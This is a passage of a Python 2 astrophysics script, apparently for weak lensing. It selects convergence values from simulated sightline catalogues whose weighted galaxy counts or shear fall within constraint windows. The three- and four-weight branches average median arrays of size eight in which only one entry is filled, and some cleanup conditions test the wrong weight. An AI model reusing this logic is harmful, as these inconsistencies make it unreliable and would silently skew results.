declareweight(weightin1)\n\nprint \"Reading...\"\n\nif conjoined == 4:\n output = '%skappahist_%s_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_%s_%s_%s_increments%s_%s_%s_%s_testinvertxyrandom.cat' % 
(rootout,lens,compmeas,innermask,handpickedstr,zinf,zsup,other,weightin1,weightin2,weightin3,weightin4,mag,radius,mode,increment1,increment2,increment3,increment4)\nif conjoined == 3:\n output = '%skappahist_%s_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_%s_%s_increments%s_%s_%s_testinvertxyrandom.cat' % (rootout,lens,compmeas,innermask,handpickedstr,zinf,zsup,other,weightin1,weightin2,weightin3,mag,radius,mode,increment1,increment2,increment3)\nif conjoined == 2:\n output = '%skappahist_%s_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_increments%s_%s_testinvertxyrandom.cat' % (rootout,lens,compmeas,innermask,handpickedstr,zinf,zsup,other,weightin1,weightin2,mag,radius,mode,increment1,increment2)\nif conjoined == 1:\n output = '%skappahist_%s_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_increments%s_testinvertxyrandom.cat' % (rootout,lens,compmeas,innermask,handpickedstr,zinf,zsup,other,weightin1,mag,radius,mode,increment1)\n\ndef readfile(file,usecols):\n f = fitsio.FITS(file)\n print f # I need to print it, or f.hdu_list will not read\n ext = len(f.hdu_list)\n for i in range(ext - 1):\n if i == 0:\n data = fitsio.read(file, columns=usecols, ext=i+1)\n else:\n data = np.r_[data,fitsio.read(file, columns=usecols, ext=i+1)]\n # for speed, fitsio always returns columns and rows in order, so for instance in [1,2,3] even when usecols=[2,3,1]\n sort = np.argsort(np.argsort(usecols))\n if len(usecols) == 1:\n return data[data.dtype.names[0]]\n if len(usecols) == 2:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]]\n if len(usecols) == 3:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]],data[data.dtype.names[sort[2]]]\n if len(usecols) == 4:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]],data[data.dtype.names[sort[2]]],data[data.dtype.names[sort[3]]]\n if len(usecols) == 5:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]],data[data.dtype.names[sort[2]]],data[data.dtype.names[sort[3]]],data[data.dtype.names[sort[4]]]\n if len(usecols) == 6:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]],data[data.dtype.names[sort[2]]],data[data.dtype.names[sort[3]]],data[data.dtype.names[sort[4]]],data[data.dtype.names[sort[5]]]\n\nif conjoined == 1:\n ''' Here I only read the columns of interest, without kappa, for ugriz, in order to find the medians of their values over the whole MS.'''\n med1 = np.zeros(1) # sized to match the single field read by the test loops below (the full script uses 8 fields)\n filters1 = \"ugriz\"\n for j in range(1):\n for i in range(1):\n if weightin1 != \"gamma\":\n weight1_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=[weight1_index])\n if i == 0:\n weight1 = weight1_\n else:\n weight1 = np.append(weight1,weight1_)\n else:\n weight1_1_,weight1_2_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=[2,3])\n if i == 0:\n weight1_1 = weight1_1_\n weight1_2 = weight1_2_\n else:\n weight1_1 = np.append(weight1_1,weight1_1_)\n weight1_2 = np.append(weight1_2,weight1_2_)\n #print j,i\n if weightin1 != \"gamma\":\n med1[j] = np.median(weight1)\n else:\n med1[j] = np.median(np.sqrt(weight1_1**2 + weight1_2**2))\n med_weight1 = np.mean(med1) # throughout the code I use med_weight1 when computing intervals, following Greene et al. For this, weight1 should always refer to simple galaxy number counts\n if weightin1 == \"gamma\":\n constr_weight1 = constr_weight1 / med_weight1 # for gamma, measured shear divided by the median value of shear in MS; this turns it into an overdensity, like the other weights, so that it is meaningful to multiply by med_weight1\n constrwidth_weight1_inf = constrwidth_weight1_inf / med_weight1\n constrwidth_weight1_sup = constrwidth_weight1_sup / med_weight1\n del weight1_1\n del weight1_1_\n del weight1_2\n del weight1_2_\n else:\n del weight1\n del weight1_\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))]) # absolute number, e.g. of galaxies within the lower width\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n \n ''' Here I read ugrizJHK, converting weighted counts into overdensities, and recording the kappa values only for overdensities satisfying the constraint. I consider the full range of the constraint.'''\n filters1 = filters\n for j in range(1):\n for i in range(1):\n if weightin1 != \"gamma\":\n kappa_, weight1_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index))\n weight1_ = weight1_ / med_weight1\n else:\n kappa_, gamma1_,gamma2_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,2,3))\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = gamma / med_weight1\n weight = np.copy(weight1_)\n print np.shape(kappa_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ] # convert overdensities into absolute counts\n print np.shape(kappa_)\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n #print j,i\n if weightin1 == \"gamma\":\n del weight1_\n del gamma1\n del gamma1_\n del gamma2\n del gamma2_\n del gamma\n else:\n del weight1_\n\nif conjoined == 2:\n med1 = np.zeros(1)\n med2 = np.zeros(1)\n filters1 = \"ugriz\"\n for j in range(1):\n for i in range(1):\n if weightin2 != \"gamma\":\n weight1_,weight2_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(weight1_index,weight2_index))\n if i == 0:\n weight1 = weight1_\n weight2 = weight2_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n else:\n weight1_,weight2_1_,weight2_2_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=[weight1_index,2,3])\n 
if i == 0:\n weight1 = weight1_\n weight2_1 = weight2_1_\n weight2_2 = weight2_2_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2_1 = np.append(weight2_1,weight2_1_)\n weight2_2 = np.append(weight2_2,weight2_2_)\n #print j,i\n if weightin2 != \"gamma\":\n med1[j] = np.median(weight1)\n med2[j] = np.median(weight2)\n else:\n med1[j] = np.median(weight1)\n med2[j] = np.median(np.sqrt(weight2_1**2 + weight2_2**2))\n med_weight1 = np.mean(med1)\n med_weight2 = np.mean(med2)\n if weightin2 == \"gamma\":\n constr_weight2 = constr_weight2 / med_weight2\n constrwidth_weight2_inf = constrwidth_weight2_inf / med_weight2\n constrwidth_weight2_sup = constrwidth_weight2_sup / med_weight2\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))])\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n E_w2_inf = np.max([1, round(med_weight1 * (constr_weight2 - constrwidth_weight2_inf))])\n E_w2_sup = np.max([1, round(med_weight1 * (-constr_weight2 + constrwidth_weight2_sup))])\n if weightin2 == \"gamma\":\n del weight1\n del weight1_\n del weight2_1\n del weight2_1_\n del weight2_2\n del weight2_2_\n else:\n del weight1\n del weight1_\n del weight2\n del weight2_\n\n filters1 = filters\n for j in range(1):\n for i in range(1):\n if weightin2 != \"gamma\":\n kappa_, weight1_,weight2_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,weight2_index))\n weight1_ = weight1_ / med_weight1\n weight2_ = weight2_ / med_weight2\n else:\n kappa_, weight1_,gamma1_,gamma2_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,2,3))\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = weight1_ / med_weight1\n weight2_ = gamma / med_weight2\n weight = np.copy(weight1_)\n print np.shape(kappa_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n weight = np.copy(weight2_)\n print np.shape(kappa_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n print np.shape(kappa_)\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * 
E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n weight2 = weight2_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n #print j,i\n if weightin1 == \"gamma\":\n del weight1_\n del weight2_\n del gamma1\n del gamma1_\n del gamma2\n del gamma2_\n del gamma\n else:\n del weight1_\n del weight2_\n\n\nif conjoined == 3:\n med1 = np.zeros(8)\n med2 = np.zeros(8)\n med3 = np.zeros(8)\n filters1 = \"ugriz\"\n for j in range(1):\n for i in range(1):\n if weightin2 != \"gamma\":\n weight1_,weight2_,weight3_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(weight1_index,weight2_index,weight3_index))\n if i == 0:\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n else:\n weight1_,weight2_1_,weight2_2_,weight3_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(weight1_index,2,3,weight3_index))\n if i == 0:\n weight1 = weight1_\n weight2_1 = weight2_1_\n weight2_2 = weight2_2_\n weight3 = weight3_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2_1 = np.append(weight2_1,weight2_1_)\n weight2_2 = np.append(weight2_2,weight2_2_)\n weight3 = np.append(weight3,weight3_)\n #print j,i\n if weightin2 != \"gamma\":\n med1[j] = np.median(weight1)\n med2[j] = np.median(weight2)\n med3[j] = np.median(weight3)\n else:\n med1[j] = np.median(weight1)\n med2[j] = np.median(np.sqrt(weight2_1**2 + weight2_2**2))\n med3[j] = np.median(weight3)\n med_weight1 = np.mean(med1)\n med_weight2 = np.mean(med2)\n med_weight3 = np.mean(med3)\n if weightin2 == \"gamma\":\n constr_weight2 = constr_weight2 / med_weight2\n constrwidth_weight2_inf = constrwidth_weight2_inf / med_weight2\n constrwidth_weight2_sup = constrwidth_weight2_sup / med_weight2\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))])\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n E_w2_inf = np.max([1, round(med_weight1 * (constr_weight2 - constrwidth_weight2_inf))])\n E_w2_sup = np.max([1, round(med_weight1 * (-constr_weight2 + constrwidth_weight2_sup))])\n E_w3_inf = np.max([1, round(med_weight1 * (constr_weight3 - constrwidth_weight3_inf))])\n E_w3_sup = np.max([1, round(med_weight1 * (-constr_weight3 + constrwidth_weight3_sup))])\n if weightin2 == \"gamma\":\n del weight1\n del weight1_\n del weight2_1\n del weight2_1_\n del weight2_2\n del weight2_2_\n del weight3\n del weight3_\n else:\n del weight1\n del weight1_\n del weight2\n del weight2_\n del weight3\n del weight3_\n\n filters1 = filters\n for j in range(1):\n for i in range(1):\n if weightin2 != \"gamma\":\n kappa_, weight1_,weight2_,weight3_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,weight2_index,weight3_index))\n weight1_ = weight1_ 
/ med_weight1\n weight2_ = weight2_ / med_weight2\n weight3_ = weight3_ / med_weight3\n else:\n kappa_, weight1_,weight3_,gamma1_,gamma2_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,weight3_index,2,3))\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = weight1_ / med_weight1\n weight2_ = gamma / med_weight2\n weight3_ = weight3_ / med_weight3\n weight = np.copy(weight1_)\n print np.shape(kappa_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n weight = np.copy(weight2_)\n print np.shape(kappa_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n del weight\n weight = np.copy(weight3_)\n print np.shape(kappa_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n print np.shape(kappa_)\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + 
increment3/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n #print j,i\n if weightin1 == \"gamma\":\n del weight1_\n del weight2_\n del weight3_\n del gamma1\n del gamma1_\n del gamma2\n del gamma2_\n del gamma\n else:\n del weight1_\n del weight2_\n del weight3_\n\nif conjoined == 4:\n med1 = np.zeros(8)\n med2 = np.zeros(8)\n med3 = np.zeros(8)\n med4 = np.zeros(8)\n filters1 = \"ugriz\"\n for j in range(1):\n for i in range(1):\n if weightin2 != \"gamma\":\n weight1_,weight2_,weight3_,weight4_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(weight1_index,weight2_index,weight3_index,weight4_index))\n if i == 0:\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n weight4 = weight4_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n weight4 = np.append(weight4,weight4_)\n else:\n weight1_,weight2_1_,weight2_2_,weight3_,weight4_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(weight1_index,2,3,weight3_index,weight4_index))\n if i == 0:\n weight1 = weight1_\n weight2_1 = weight2_1_\n weight2_2 = weight2_2_\n weight3 = weight3_\n weight4 = weight4_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2_1 = np.append(weight2_1,weight2_1_)\n weight2_2 = np.append(weight2_2,weight2_2_)\n weight3 = np.append(weight3,weight3_)\n weight4 = np.append(weight4,weight4_)\n #print j,i\n if weightin2 != \"gamma\":\n med1[j] = np.median(weight1)\n med2[j] = np.median(weight2)\n med3[j] = np.median(weight3)\n med4[j] = np.median(weight4)\n else:\n med1[j] = np.median(weight1)\n med2[j] = np.median(np.sqrt(weight2_1**2 + weight2_2**2))\n med3[j] = np.median(weight3)\n med4[j] = np.median(weight4)\n med_weight1 = np.mean(med1)\n med_weight2 = np.mean(med2)\n med_weight3 = np.mean(med3)\n med_weight4 = np.mean(med4)\n if weightin2 == \"gamma\":\n constr_weight2 = constr_weight2 / med_weight2\n constrwidth_weight2_inf = constrwidth_weight2_inf / med_weight2\n constrwidth_weight2_sup = constrwidth_weight2_sup / med_weight2\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))])\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n E_w2_inf = np.max([1, round(med_weight1 * (constr_weight2 - constrwidth_weight2_inf))])\n E_w2_sup = np.max([1, round(med_weight1 * (-constr_weight2 + constrwidth_weight2_sup))])\n E_w3_inf = np.max([1, round(med_weight1 * (constr_weight3 - constrwidth_weight3_inf))])\n E_w3_sup = np.max([1, round(med_weight1 * (-constr_weight3 + constrwidth_weight3_sup))])\n E_w4_inf = np.max([1, round(med_weight1 * (constr_weight4 - constrwidth_weight4_inf))])\n E_w4_sup = np.max([1, round(med_weight1 * (-constr_weight4 + constrwidth_weight4_sup))])\n if weightin2 == \"gamma\":\n del weight1\n del weight1_\n del weight2_1\n del weight2_1_\n del weight2_2\n del weight2_2_\n del weight3\n del weight3_\n del weight4\n del weight4_\n else:\n del weight1\n del weight1_\n 
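# -- Illustrative aside, not part of the pipeline script. The conjoined == 2, 3
#    and 4 branches repeat the same window expression once per weight array. A
#    hedged sketch (hypothetical helper names) of an equivalent refactoring that
#    builds each boolean mask once and intersects them, so the long expressions
#    cannot drift out of sync between arrays:

import numpy as np

def window_mask(weight, med_weight, constr, E_inf, E_sup, limsigma, increment):
    # same half-open window as in the script, in absolute counts
    counts = weight * med_weight
    lo = round(constr * med_weight) - limsigma * E_inf - increment / 2.0
    hi = round(constr * med_weight) + limsigma * E_sup + increment / 2.0
    return (counts >= lo) & (counts < hi)

def apply_masks(arrays, masks):
    total = np.logical_and.reduce(masks)  # intersection of all per-weight windows
    return [a[total] for a in arrays]

# Usage would be one mask per constrained weight, then a single pass that trims
# kappa and every weight array together, matching the sequential cuts above.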
del weight2\n del weight2_\n del weight3\n del weight3_\n del weight4\n del weight4_\n\n filters1 = filters\n for j in range(1):\n for i in range(1):\n if weightin2 != \"gamma\":\n kappa_, weight1_,weight2_,weight3_,weight4_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,weight2_index,weight3_index,weight4_index))\n weight1_ = weight1_ / med_weight1\n weight2_ = weight2_ / med_weight2\n weight3_ = weight3_ / med_weight3\n weight4_ = weight4_ / med_weight4\n else:\n kappa_, weight1_,weight3_,weight4_,gamma1_,gamma2_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,weight3_index,weight4_index,2,3))\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = weight1_ / med_weight1\n weight2_ = gamma / med_weight2\n weight3_ = weight3_ / med_weight3\n weight4_ = weight4_ / med_weight4\n weight = np.copy(weight1_)\n print np.shape(kappa_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n weight = np.copy(weight2_)\n print np.shape(kappa_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * 
med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n del weight\n weight = np.copy(weight3_)\n print np.shape(kappa_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n del weight\n weight = np.copy(weight4_)\n print np.shape(kappa_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight4 * med_weight1) - limsigma * E_w4_inf - increment4/2.0) & (weight * med_weight1 < round(constr_weight4 * med_weight1) + limsigma * E_w4_sup + increment4/2.0) ]\n print np.shape(kappa_)\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight4 * med_weight1) - limsigma * E_w4_inf - increment4/2.0) & (weight * med_weight1 < round(constr_weight4 * med_weight1) + limsigma * E_w4_sup + increment4/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight4 * med_weight1) - limsigma * E_w4_inf - increment4/2.0) & (weight * med_weight1 < round(constr_weight4 * med_weight1) + limsigma * E_w4_sup + increment4/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight4 * med_weight1) - limsigma * E_w4_inf - increment4/2.0) & (weight * med_weight1 < round(constr_weight4 * med_weight1) + limsigma * E_w4_sup + increment4/2.0) ]\n weight4_ = weight4_[(weight * med_weight1 >= round(constr_weight4 * med_weight1) - limsigma * E_w4_inf - increment4/2.0) & (weight * med_weight1 < round(constr_weight4 * med_weight1) + limsigma * E_w4_sup + 